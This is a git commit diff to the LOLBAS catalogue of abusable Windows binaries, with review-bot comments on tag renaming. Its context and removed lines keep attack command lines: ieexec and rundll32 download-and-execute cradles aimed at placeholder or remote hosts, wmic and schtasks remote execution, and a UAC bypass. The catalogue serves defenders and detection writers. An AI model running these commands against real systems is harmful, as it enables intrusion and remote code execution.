mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 22:39:27 +01:00
Various changes to Execute tags
This commit is contained in:
parent
ab3ea8ff63
commit
089614e6a9
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: .NetObjets
|
||||
- Execute: .NetObjects
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddinUtil.exe
|
||||
|
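Review bot: the fix from `.NetObjets` to `.NetObjects` is right, but nothing stops the same misspelling landing again, since the tag value is free text. Put the accepted `Execute:` values into the YAML schema or the repo's validation script so CI rejects unknown tags. Note that `.NetObjects` is also the value the Eventvwr deserialization entry receives later in this diff, so the two files now agree on one spelling.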
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1053.002
|
||||
OperatingSystem: Windows 7 or older
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: C:\WINDOWS\System32\At.exe
|
||||
- Path: C:\WINDOWS\SysWOW64\At.exe
|
||||
|
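Review bot: this is the first of many hunks that swap `Execute: EXE` for `Execute: CMD`, and the commit message ("Various changes to Execute tags") does not say what the two values are meant to distinguish. State the rule (for example: `CMD` for an arbitrary command line, `EXE` for a specific binary) in the commit message or the tag documentation, otherwise the next contributor will pick either at random and the rename will drift back.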
@ -22,6 +22,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Tags:
|
||||
- Execute: INF
|
||||
- Execute: Remote
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\cmstp.exe
|
||||
- Path: C:\Windows\SysWOW64\cmstp.exe
|
||||
|
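Review bot: adding `Execute: Remote` fits cmstp.exe loading an INF from a URL. Style point on the untouched context line: `OperatingSystem: Windows vista` is lowercase here and in most files of this diff, while the AddinUtil and Msiexec hunks spell it `Windows Vista`; since every one of these files is being edited anyway, normalise the capitalisation in the same pass.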
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
- Command: "conhost.exe --headless calc.exe"
|
||||
Description: Execute calc.exe with conhost.exe as parent process
|
||||
Usecase: Specify --headless parameter to hide child process window (if applicable)
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\conhost.exe
|
||||
Detection:
|
||||
|
@ -13,6 +13,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Tags:
|
||||
- Application: GUI
|
||||
- Execute: EXE
|
||||
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
|
||||
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
|
||||
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
|
||||
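Review bot: the tag block in this hunk sits immediately before the `ysoserial.exe ... eventvwr.exe` command line, so in YAML it belongs to the preceding entry (the one not shown), and the deserialization entry's own tags are in the next hunk. Check that `Application: GUI` and `Execute: EXE` were added to the entry they describe rather than shifted by one entry, which is easy to do when tags are appended at the end of each entry.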
@ -22,6 +23,7 @@ Commands:
|
||||
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Tags:
|
||||
- Application: GUI
|
||||
- Execute: .NetObjects
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\eventvwr.exe
|
||||
- Path: C:\Windows\SysWOW64\eventvwr.exe
|
||||
|
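Review bot: `Execute: .NetObjects` on its own under-describes the deserialization entry: the BinaryFormatter `DataSet` gadget is the delivery, but what the Command line actually produces is a spawned process (`-c calc`). Tag the resulting execution as well (`Execute: CMD`, the value this commit uses elsewhere for arbitrary command lines) so a search for command-execution LOLBins still returns eventvwr.exe.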
@ -11,8 +11,9 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
- Command: HH.exe c:\windows\system32\calc.exe
|
||||
Description: Executes calc.exe with HTML Help.
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Application: GUI
|
||||
Usecase: Execute process with HH.exe
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
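Review bot: in this hunk the `Tags:` block ends up between `Description:` and `Usecase:` of the calc.exe entry, whereas every other file in the diff places `Tags:` last in an entry, after `OperatingSystem:`. If that is the on-disk order after this commit, move the block to the end of the entry; a validator that expects one key order will otherwise have to special-case HH.yml.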
@ -20,7 +21,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Command: HH.exe http://some.url/payload.chm
|
||||
- Application: GUI
|
||||
Description: Executes a remote payload.chm file which can contain commands.
|
||||
Usecase: Execute commands with HH.exe
|
||||
Category: Execute
|
||||
|
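Review bot: `HH.exe http://some.url/payload.chm` fetches the CHM from a remote host, which is the same shape as the cmstp and ieexec entries that gain `Execute: Remote` in this commit, yet only `EXE` and `Application: GUI` appear here. Add `Remote` to this entry too, otherwise the remote-fetch tag is applied inconsistently across files touched by the same change.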
@ -13,7 +13,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Tags:
|
||||
- Execute: Remote
|
||||
- Execute: .NetEXE
|
||||
- Execute: EXE (.NET)
|
||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
Description: Downloads and executes bypass.exe from the remote server.
|
||||
Usecase: Download and run attacker code from remote location
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Tags:
|
||||
- Execute: Remote
|
||||
- Execute: .NetEXE
|
||||
- Execute: EXE (.NET)
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
|
||||
|
@ -12,8 +12,8 @@ Commands:
|
||||
MitreID: T1218.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: .NetEXE
|
||||
- Execute: DLL (.NET)
|
||||
- Execute: EXE (.NET)
|
||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||
Description: Execute the target .NET DLL or EXE.
|
||||
Usecase: Use to execute code and bypass application whitelisting
|
||||
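Review bot: the renamed values `DLL (.NET)` and `EXE (.NET)` contain a space and parentheses, where the previous `.NetDLL` / `.NetEXE` were single tokens. Confirm that the site generator, the tag filter on the website and any script that splits tag values on whitespace handle the new form before merging; the Description line ("Execute the target .NET DLL or EXE") matches the new tags, so the semantics are fine.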
@ -22,8 +22,8 @@ Commands:
|
||||
MitreID: T1218.004
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: .NetEXE
|
||||
- Execute: DLL (.NET)
|
||||
- Execute: EXE (.NET)
|
||||
- Command: InstallUtil.exe https://example.com/payload
|
||||
Description: It will download a remote payload and place it in INetCache.
|
||||
Usecase: Downloads payload from remote server
|
||||
|
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Execute: JScript
|
||||
- Command: jsc.exe /t:library Library.js
|
||||
Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.
|
||||
Usecase: Compile attacker code on system. Bypass defensive counter measures.
|
||||
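Review bot: jsc.exe only compiles `Library.js` into `Library.dll`; nothing in the Command line runs the result, so an `Execute:` tag of either value (`WSH` before, `JScript` after) overstates what the entry demonstrates. If the taxonomy has no compile-only value, say so in the tag documentation and let the Usecase line ("Compile attacker code on system") carry the distinction, or add a second command to the entry that actually loads the produced DLL.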
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Execute: JScript
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
|
||||
|
@ -22,8 +22,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10S, Windows 11
|
||||
Tags:
|
||||
- Execute: VB.Net
|
||||
- Execute: Csharp
|
||||
- Execute: XOML
|
||||
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
|
||||
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
|
||||
Usecase: Compile and run code
|
||||
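Review bot: replacing the two language tags (`VB.Net`, `Csharp`) with a single `XOML` tag drops information the Description still states ("Compile and execute C# or VB.net code in a XOML file"). Keep the language tags alongside `XOML`, using the `CSharp` spelling the msbuild hunks settle on: XOML is the container, C# or VB.NET is what runs, and both are useful search keys.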
@ -32,8 +31,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10S, Windows 11
|
||||
Tags:
|
||||
- Execute: VB.Net
|
||||
- Execute: Csharp
|
||||
- Execute: XOML
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
|
||||
Code_Sample:
|
||||
|
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218.014
|
||||
OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Execute: COM
|
||||
- Command: mmc.exe gpedit.msc
|
||||
Description: Load an arbitrary payload DLL by configuring COR Profiler registry settings and launching MMC to bypass UAC.
|
||||
Usecase: Modify HKCU\Environment key in Registry with COR profiler values then launch MMC to load the payload DLL.
|
||||
@ -20,6 +20,8 @@ Commands:
|
||||
Privileges: Administrator
|
||||
MitreID: T1218.014
|
||||
OperatingSystem: Windows 10 (and possibly earlier versions), Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\mmc.exe
|
||||
- Path: C:\Windows\SysWOW64\mmc.exe
|
||||
|
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1127.001
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: Csharp
|
||||
- Execute: CSharp
|
||||
- Command: msbuild.exe project.csproj
|
||||
Description: Build and execute a C# project stored in the target csproj file.
|
||||
Usecase: Compile and run code
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1127.001
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: Csharp
|
||||
- Execute: CSharp
|
||||
- Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo
|
||||
Description: Executes generated Logger DLL file with TargetLogger export
|
||||
Usecase: Execute DLL
|
||||
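Review bot: the tag block in this hunk precedes the `/logger:TargetLogger,C:\Loggers\TargetLogger.dll` command, so it describes the `project.csproj` entry, not the logger one. The logger entry loads a managed assembly (the Description says "Executes generated Logger DLL file"), and its tags are outside the hunk; make sure it receives `DLL (.NET)` rather than inheriting `CSharp` from its neighbour.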
@ -39,7 +39,7 @@ Commands:
|
||||
MitreID: T1127.001
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: WSH
|
||||
- Execute: XSL
|
||||
- Command: msbuild.exe @sample.rsp
|
||||
Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.
|
||||
Usecase: Bypass command-line based detections
|
||||
|
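Review bot: the swap from `WSH` to `XSL` changes meaning rather than spelling, and the entry it applies to is not in the hunk (the trailing context is the next entry's `@sample.rsp` command). Add a sentence to the commit or PR explaining which msbuild entry executes an XSL stylesheet, since msbuild inline tasks are normally described as C# or VB code, and a reader of the history cannot tell from this hunk why the language tag moved.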
@ -51,6 +51,8 @@ Commands:
|
||||
MitreID: T1218.007
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: MSI
|
||||
- Execute: MST
|
||||
- Execute: Remote
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\msiexec.exe
|
||||
|
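Review bot: `Execute: MST` is a new vocabulary value introduced here. An MST is a transform applied on top of an MSI (`msiexec /i x.msi TRANSFORMS=y.mst`), so document in the tag list that it means "code delivered through a transform", otherwise it will be read as a duplicate of `MSI` and applied inconsistently.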
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218.009
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: DLL (.NET)
|
||||
- Command: regasm.exe /U AllTheThingsx64.dll
|
||||
Description: Loads the target .DLL file and executes the UnRegisterClass function.
|
||||
Usecase: Execute code and bypass Application whitelisting
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1218.009
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: DLL (.NET)
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
|
||||
|
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218.009
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: DLL (.NET)
|
||||
- Command: regsvcs.exe AllTheThingsx64.dll
|
||||
Description: Loads the target .Net DLL file and executes the RegisterClass function.
|
||||
Usecase: Execute dll file and bypass Application whitelisting
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1218.009
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: DLL (.NET)
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegSvcs.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
|
||||
|
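Review bot: the Full_Path block lists only the `Framework64` copies of RegSvcs.exe (v2.0.50727 and v4.0.30319) and omits the 32-bit `Framework` paths, while the regasm hunk above has the inverse gap (both `Framework` and `Framework64`, but only v2.0.50727, no v4.0.30319). Both binaries ship in all four locations; since the files are open for editing, complete the path lists in the same change.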
@ -22,15 +22,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")
|
||||
Description: Use Rundll32.exe to execute a JavaScript script that runs a PowerShell script that is downloaded from a remote web site.
|
||||
Usecase: Execute code from Internet
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: JScript
|
||||
- Execute: Remote
|
||||
- Command: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
|
||||
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe.
|
||||
Usecase: Proxy execution
|
||||
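Review bot: this hunk is not a tag change. By the header (`-22,15 +22,7`) eight lines go, which is a whole command entry: the `javascript:` + `WScript.Shell` + `powershell ... DownloadString('http://ip:port/')` download cradle. Removing a documented technique needs its own justification (superseded by the `GetObject("script:...")` entry further down? no longer works on current builds?); split it into a separate commit with that reason, or keep the entry and only retag it, otherwise "Various changes to Execute tags" hides a content removal.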
@ -40,15 +32,6 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: JScript
|
||||
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
|
||||
Description: Use Rundll32.exe to execute a JavaScript script that runs calc.exe and then kills the Rundll32.exe process that was started.
|
||||
Usecase: Proxy execution
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: JScript
|
||||
- Command: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
|
||||
Description: Use Rundll32.exe to execute a JavaScript script that calls a remote JavaScript script.
|
||||
Usecase: Execute code from Internet
|
||||
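Review bot: same problem as the previous hunk (`-40,15 +32,6`): the `calc.exe` plus `taskkill /f /im rundll32.exe` variant disappears. If the intent is that it duplicates the `eval(...)` calc entry, say so in the commit; it was the only entry showing the self-terminating rundll32 pattern, so consider moving that detail into the surviving entry's Description rather than dropping it silently.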
@ -75,8 +58,7 @@ Commands:
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10 (and likely previous versions), Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Execute: EXE
|
||||
- Execute: COM
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\rundll32.exe
|
||||
- Path: C:\Windows\SysWOW64\rundll32.exe
|
||||
|
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Tags:
|
||||
- Execute: Powershell
|
||||
- Execute: PowerShell
|
||||
Full_Path:
|
||||
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.15_none_c2df1bba78111118\Runscripthelper.exe
|
||||
- Path: C:\Windows\WinSxS\amd64_microsoft-windows-u..ed-telemetry-client_31bf3856ad364e35_10.0.16299.192_none_ad4699b571e00c4a\Runscripthelper.exe
|
||||
|
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1053.005
|
||||
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
|
||||
Description: Create a scheduled task on a remote computer for persistence/lateral movement
|
||||
Usecase: Create a remote task to run daily relative to the the time of creation
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1053.005
|
||||
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\schtasks.exe
|
||||
- Path: c:\windows\syswow64\schtasks.exe
|
||||
|
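Review bot: the tags in this hunk belong to the last entry of the file, the `/s targetmachine` task creation (the trailing context is `Full_Path`), whose Description already calls it persistence/lateral movement against a remote computer. This commit adds `Execute: Remote` to cmstp, msiexec and wmic but not here; add it for consistency.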
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 8, Windows 8.1, Windows 10
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\SettingSyncHost.exe
|
||||
- Path: C:\Windows\SysWOW64\SettingSyncHost.exe
|
||||
|
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10 1809, Windows Server 2019
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
- Command: ssh -o ProxyCommand=calc.exe .
|
||||
Description: Executes calc.exe from ssh.exe
|
||||
Usecase: Performs execution of specified file, can be used as a defensive evasion.
|
||||
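Review bot: minor, on context lines: the `ProxyCommand=calc.exe` entry says `Windows 10 1809, Windows Server 2019` while the second ssh entry in the next hunk says only `Windows 10`. Both rely on the same bundled OpenSSH client, so pick one value, and Windows 11 (which installs the client by default) should be listed in both.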
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\OpenSSH\ssh.exe
|
||||
Detection:
|
||||
|
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10 1709, Windows 10 1703, Windows 10 1607
|
||||
Tags:
|
||||
- Execute: Powershell
|
||||
- Execute: PowerShell
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\SyncAppvPublishingServer.exe
|
||||
- Path: C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
|
||||
|
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218.012
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Execute: COM
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\verclsid.exe
|
||||
- Path: C:\Windows\SysWOW64\verclsid.exe
|
||||
|
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
- Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"
|
||||
Description: Execute evil.exe on the remote system.
|
||||
Usecase: Execute binary on a remote system
|
||||
@ -30,7 +30,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
- Execute: Remote
|
||||
- Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"
|
||||
Description: Create a volume shadow copy of NTDS.dit that can be copied.
|
||||
|
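Review bot: in the trailing context, `- Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/.../Wmic_calc.xsl"` is immediately followed by `Description: Create a volume shadow copy of NTDS.dit that can be copied.` If that is the on-disk order (and not a rendering artefact of this view), the description belongs to the `shadowcopy call create` entry and the XSL entry has lost its own; fix that before retagging, since the tags here (`EXE`, `CMD`, `Remote`) describe the `/node` entry above them and say nothing about the XSL one.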
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Execute: COM
|
||||
- Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
|
||||
Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switch prevent an error message in later Windows 10 builds.
|
||||
Usecase: Run a com object created in registry to evade defensive counter measures
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: DLL
|
||||
- Execute: COM
|
||||
- Command: xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://pastebin.com/raw/iLxUT5gM
|
||||
Description: Xwizard.exe uses RemoteApp and Desktop Connections wizard to download a file, and save it to INetCache.
|
||||
Usecase: Download file from Internet
|
||||
|
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1218.015
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
- Command: msedgewebview2.exe --disable-gpu-sandbox --gpu-launcher="calc.exe"
|
||||
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
|
||||
Usecase: Proxy execution of binary
|
||||
@ -30,7 +30,7 @@ Commands:
|
||||
MitreID: T1218.015
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
- Command: msedgewebview2.exe --no-sandbox --renderer-cmd-prefix="calc.exe"
|
||||
Description: This command launches the Microsoft Edge WebView2 browser control without sandboxing and will spawn calc.exe as its subprocess.
|
||||
Usecase: Proxy execution of binary
|
||||
@ -39,7 +39,7 @@ Commands:
|
||||
MitreID: T1218.015
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe
|
||||
Detection:
|
||||
|
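Review bot: the Full_Path `C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe` pins a single Edge build and will be stale on every host with a different version. Use a placeholder the way the Wt entry in this diff does (`Microsoft.WindowsTerminal_<version_packageid>`), e.g. `...\Edge\Application\<version>\msedgewebview2.exe`; the AccCheckConsole paths with `10.0.22000.0` have the same issue.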
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_<version_packageid>\wt.exe
|
||||
Detection:
|
||||
|
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: URL
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\ieframe.dll
|
||||
- Path: c:\windows\syswow64\ieframe.dll
|
||||
|
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: URL
|
||||
Full_Path:
|
||||
- Path: c:\windows\system32\shdocvw.dll
|
||||
- Path: c:\windows\syswow64\shdocvw.dll
|
||||
|
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: URL
|
||||
- Command: rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e
|
||||
Description: Launch an executable by calling OpenURL.
|
||||
Usecase: Load an executable payload by specifying the file protocol handler (obfuscated).
|
||||
|
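Review bot: `Execute: URL` is a new value and the three rundll32-hosted DLL entries in this diff (ieframe.dll, shdocvw.dll, url.dll) all receive it. Document that it means "a URL or protocol-handler string is the vehicle" (here `file://` pointing at `calc.exe`, caret-obfuscated) and not "fetches a payload over the network", which is what `Remote` already covers; without that note the two will be used interchangeably.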
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1216
|
||||
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: DLL (.NET)
|
||||
Full_Path:
|
||||
- Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
|
||||
Code_Sample:
|
||||
|
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1216
|
||||
OperatingSystem: Windows 10
|
||||
Tags:
|
||||
- Execute: Powershell
|
||||
- Execute: PowerShell
|
||||
Full_Path:
|
||||
- Path: C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
|
||||
- Path: C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
|
||||
|
@ -12,7 +12,6 @@ Commands:
|
||||
